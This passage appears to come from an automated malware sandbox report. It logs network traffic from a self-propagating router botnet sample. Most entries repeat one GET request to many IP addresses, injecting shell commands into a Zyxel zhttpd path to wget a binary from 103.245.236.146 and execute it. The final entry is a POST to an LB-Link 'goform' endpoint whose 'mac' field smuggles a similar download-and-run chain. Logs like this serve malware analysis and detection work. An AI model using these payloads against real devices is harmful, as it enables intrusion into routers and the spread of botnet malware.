                                                  Jan 19, 2024 18:24:09.332199097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7790192.168.2.1356310217.248.184.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332247019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7791192.168.2.1344346151.178.98.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332294941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7792192.168.2.135132295.94.252.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332331896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7793192.168.2.1350806197.149.136.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332393885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7794192.168.2.135944080.43.82.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332427979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7795192.168.2.1351862125.132.109.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332462072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7796192.168.2.135813224.176.226.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332515001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7797192.168.2.135991890.243.2.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332531929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7798192.168.2.135487673.158.205.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332596064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7799192.168.2.133533075.215.126.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332618952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7800192.168.2.1333584151.145.101.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332669020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7801192.168.2.13420204.236.237.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332720041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7802192.168.2.135530823.30.219.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332787991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7803192.168.2.1359164140.127.90.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332812071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7804192.168.2.133527299.252.229.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332825899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7805192.168.2.1341898189.198.169.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332849026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7806192.168.2.134899285.95.247.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332884073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7807192.168.2.134366690.79.181.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332933903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7808192.168.2.1337994138.24.190.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332967997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7809192.168.2.1349534115.71.56.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333014965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7810192.168.2.1359542209.94.89.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333054066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7811192.168.2.135861673.18.45.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333106041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7812192.168.2.1333310135.224.238.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333132982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7813192.168.2.1350786206.105.186.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333165884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7814192.168.2.1341036101.80.30.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333204985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7815192.168.2.135055088.178.80.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333262920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7816192.168.2.1356074140.43.113.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333307028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7817192.168.2.135672046.169.56.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333338976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7818192.168.2.135387213.68.85.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333379030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7819192.168.2.133315869.231.199.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333420038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7820192.168.2.135256876.73.242.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333452940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7821192.168.2.1357794120.3.160.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333486080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7822192.168.2.1340124106.98.220.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333542109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7823192.168.2.1346392129.139.97.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333595037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7824192.168.2.1338224180.125.215.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333627939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7825192.168.2.13512842.171.22.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333668947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7826192.168.2.133882431.141.144.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333705902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7827192.168.2.135564014.113.202.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333746910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7828192.168.2.1344192201.113.151.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333797932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7829192.168.2.135423492.136.237.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333831072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7830192.168.2.1336476187.106.211.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333859921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7831192.168.2.1350696146.111.23.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333911896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7832192.168.2.1358770108.109.242.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333950996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7833192.168.2.134624280.38.224.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.333992004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7834192.168.2.133841632.133.84.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334043980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7835192.168.2.133873889.201.11.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334086895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7836192.168.2.133703263.248.7.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334121943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7837192.168.2.135364669.19.130.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334163904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7838192.168.2.1332942137.87.204.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334204912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7839192.168.2.13399261.24.35.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334249020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7840192.168.2.133635676.185.204.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334270954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7841192.168.2.1348814102.80.189.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334321022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7842192.168.2.1336120217.74.64.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334333897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7843192.168.2.1350224137.213.125.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334378958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7844192.168.2.135709637.18.62.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.334412098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7845192.168.2.134927465.135.250.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.337832928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7846192.168.2.133576817.71.79.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.337872982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7847192.168.2.135758475.171.106.1388080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.829657078 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:09.982793093 CET308INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Connection: close
                                                  Date: Fri, 19 Jan 2024 10:24:09 GMT
                                                  Content-Length: 168
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /goform/set_LimitClient_cfg was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7848192.168.2.1352988189.85.90.738080
